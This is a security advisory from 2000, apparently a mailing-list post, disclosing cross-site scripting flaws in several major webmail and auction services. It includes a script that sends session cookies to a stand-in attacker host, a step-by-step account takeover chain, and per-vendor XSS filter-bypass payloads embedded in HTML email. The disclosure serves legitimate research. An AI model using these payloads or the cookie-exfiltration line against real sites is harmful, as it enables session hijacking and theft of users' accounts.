webmail.txt

`-Web Application Security Survey-  
Results show that Microsoft Hotmail, Excite, Altavista, E-Bay, Lycos  
Netscape WebMail, E-Trade, Infoseek/Go.com and their users are all  
currently vulnerable to web based attack.  
  
[disclaimer]  
The opinions, ideas and information expressed in the following text are  
my own and not of any company. I shall not be held liable in anyway  
from the direct or indirect use or misuse of this information. This  
data is for informational, and security research purposes. The author  
will   
provide no technical support for vulnerabilities stated herein.  
If clarification is needed, please contact the appropriate vendor.  
  
  
[intro]  
The following report is the result of a two hour security survey of  
high profile webmail and auction services offered free over  
the internet. This survey is in no way extensive or thorough.  
It serves only as "proof of concept" that these types of services  
are vulnerable to attack on a wide scale. All the following  
vulnerabilities are currently active as of Aug. 25, 2000.  
  
Please note that the following vulnerabilities are NOT new and have  
been   
posted publicly for weeks if not months either by myself or others.  
  
[background and proof of concept]  
The following webmail vulnerabilities all stem from the same problem.  
The attacker has the ability to pass unfiltered malicious  
HTML/JavaScript into the target users web environment. This means that  
the attacker can write code and send to the user to be then executed on  
the client side. Whatever is within the reach of javascript access, now  
the attacker is also able to access remotely. What sensitive things  
does javascript/the attacker have access to within the browser?  
  
1) Browser Cookies  
2) Document Location  
3) Browser and System Settings  
4) Client Host Network Information  
  
The above are the most prominent and sensitive information contained.  
  
The focus of the following vulnerabilities only apply to #1  
(Browser Cookies). Most if not all webmail services use cookie data  
for authentication. If the attacker were to compromise the cookie  
data of the user, the account can now be accessed. Simply, if  
the attacker can pilfer the cookie data, they can substitute that  
cookie  
into their own browser and authenticate without the knowledge of a   
username/password being necessary.Thus the attacker has become the  
target user until the session runs out. Variants may be required to  
achieve maximum results. Remember, this is only proof of concept.  
  
Also worth mention is that the attacker may use any browser specific  
vulnerabilites requiring the use of JavaScript. Such vulnerabilities  
as browser cache exploits, history exploits, and others.  
  
How does the attacker bypass browser cookie security to move the cookie  
data off the intended cookie domain to another? Good Question.  
  
Let's say that the attacker is able to execute arbitrary  
HTML/JavaScript  
on the target user's machine. We now know the javascript has access to  
the  
cookie strings on the executed domain. The attacker using javascript  
can  
issue a "GET" request, say though the use of an "IMG" tag or webpage  
request,  
appending the cookie string to the end of the request.  
  
<SCRIPT>  
document.sender.src = "http://www.attacker.com/evil.cgi/" +  
document.cookie;  
</SCRIPT>  
<IMG NAME=sender SRC="some_image.gif">  
  
which in essence becomes:  
<IMG NAME=sender  
SRC="http://www.attacker.com/evil.cgi/users_cookie_data">  
  
Making it even harder to detect, a 1 pixel by 1 pixel image would also  
work.  
This can all happen quickly on the fly with javascript in many varying  
ways.  
  
The rest of the document relies on this principal flaw. If an attacker  
can cause the user to view unrestricted arbitrary HTML/JavaScript  
within  
their environment, the account is vulnerable. This is the general  
premise.  
  
To summarize lets follow the chain of events.  
1) Attacker sends a crafted HTML/Javascript email to his target.  
2) User signs into whatever service and is assigned an authentication  
cookie.  
3) User reads attacker's email.  
4) User's Cookie is secretly sent to attackers CGI via an invisible GET  
  
request.  
5) User continues on, never being the wiser.  
6) Attacker checks his CGI logs and finds the cookie string.  
7) Attacker places the victims cookie in his/her own cookie file  
8) Logs onto service with users account.  
  
Simple.  
  
[affected]  
The following companies were not picked by any other method other than  
that  
they have free webmail or auction services and a large user base.  
  
Microsoft Hotmail http://www.hotmail.com/  
Excite Mail http://inbox.excite.com/  
Altavista Mail http://www.altavista.com/  
E-Bay Chat Forums http://www.ebay.com/  
Lycos http://comm.lycos.com/  
Netscape WebMail http://home.netscape.com/webmail/index-f.html  
E-Trade Mail http://www.etrade.com  
Infoseek/Go.com http://register.go.com/  
  
Anyone on the list not mentioned does not mean that they are not  
vulnerable. Only that they havent been looked at.  
  
[vulnerability]  
All the following vulnerabilities rely on sending HTML Mail to target  
user. The following information is for example purposes only and not a  
complete account compromise (not required for point demonstration). All  
that is shown is that the embedded JavaScript code will use an alert  
dialog window to display cookie data to the user. Anything you do to go  
further with the exploitation is of your own accord.  
  
******EXAMPLE******  
MIME-Version: 1.0  
From: hacker <[email protected]>  
Content-Type: text/html; charset=us-ascii  
Content-Transfer-Encoding: 7bit  
Subject: The Example  
<HTML><BODY>  
  
INSERT EXPLOIT HERE  
  
</BODY></HTML>  
.  
*******************  
=======================================================================  
Microsoft Hotmail  
Vulnerable to: "HTML Entity"  
Exploit:   
  
<!-- REMOVE THE OFFENDING SLASH -->  
<IMG SRC="javas&\#09;cript:alert(document.cookie);">  
=======================================================================  
Excite Mail  
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"  
Exploit:   
<IMG SRC="j  
  
avascr  
  
ipt:ale  
  
rt(document.cookie);">  
=======================================================================  
Altavista  
Vulnerable to: "HTML Entity"  
Exploit:   
  
<!-- REMOVE THE OFFENDING SLASH -->  
<IMG SRC="javas&\#09;cript:alert(document.cookie);">  
=======================================================================  
E-Bay Chat Forums  
Vulnerable to: "IMG SRC JavaScript Execute"  
Exploit:   
<IMG SRC="javascript:alert(document.cookie);">  
=======================================================================  
Lycos/MailCity  
Vulnerable to: "STYLE TYPE JavaScript"  
Exploit:   
<style TYPE="text/javascript">   
alert(document.cookie);  
</style>   
=======================================================================  
Netscape WebMail (netscape.net)  
Vulnerable to: "STYLE TYPE JavaScript"  
Exploit:   
<style TYPE="text/javascript">   
alert(document.cookie);  
</style>   
=======================================================================  
E-Trade FreeMail  
Vulnerable to: "STYLE TYPE JavaScript"  
Exploit:   
<IMG SRC="livescript:alert(document.cookie);">  
  
=======================================================================  
Infoseek/Go Network Mail  
Vulnerable to: "Multi-Line Break IMG SRC JavaScript Execute"  
Exploit:   
<IMG SRC="j  
  
avascr  
  
ipt:ale  
  
rt(document.cookie);">  
=======================================================================  
  
  
[Solution]  
Vendor: Filter for known JavaScript strings and disallow them from   
entering the users envirornment.  
  
User: Turn off JavaScript until fix has been implamented by vendor.  
  
  
  
__________________________________________________  
Do You Yahoo!?  
Yahoo! Mail - Free email you can access from anywhere!  
http://mail.yahoo.com/  
`